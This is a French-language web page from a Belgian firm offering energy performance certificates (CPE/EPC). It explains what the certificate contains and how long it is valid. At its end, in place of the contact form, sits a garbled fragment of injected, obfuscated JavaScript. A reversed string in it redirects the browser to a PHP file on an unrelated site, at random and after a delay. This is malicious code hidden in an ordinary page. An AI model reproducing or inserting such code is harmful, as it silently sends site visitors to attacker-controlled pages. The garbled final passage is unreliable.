logo proprietaire

078 05 07 78

(Tarif local)

Certificat de performance énergétique


Certificat de performance énergétique

Le certificat de performance énergétique (CPE) est un document qui indique la consommation énergétique estimée d’une habitation ou d’un appartement. Il s’agit d’un document obligatoire lors de la location ou de la vente d’une habitation ou d’un appartement. L’objectif de ce document est de donner une idée au locataire ou à l’acheteur de la consommation énergétique de l’habitation ou de l’appartement.

En Flandre, ce document est appelé ‘EPC’ et en Wallonie, CPE (Certificat de performance énergétique). Cette attestation a une durée de validité de 10 ans. Pour les nouvelles constructions ou appartements qui sont loués ou vendus, ce document ne doit pas être établi. Il faut établir un document PEB, qui sert également d’EPC.

Un certificat de performance énergétique comprend environ 5 à 10 pages et reprend entre autres:
• la valeur CPE : nombre exprimé en kWh/m² qui représente la consommation énergétique en kWh/an par m² de l’habitation ou de l’appartement.
• Conseils permettant des économies d’énergie.
• Une série de données administratives.

Nous pouvons établir le document CPE. Le prix de ce document dépend du type d’habitation ou d’appartement et de la disponibilité ou non des plans.

Contactez-nous par téléphone (078 – 05 07 78) ou inscrivez-vous via le formulaire suivant.

[contact-form-7 404 "Not Found"]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande certificat de performance énergétique”]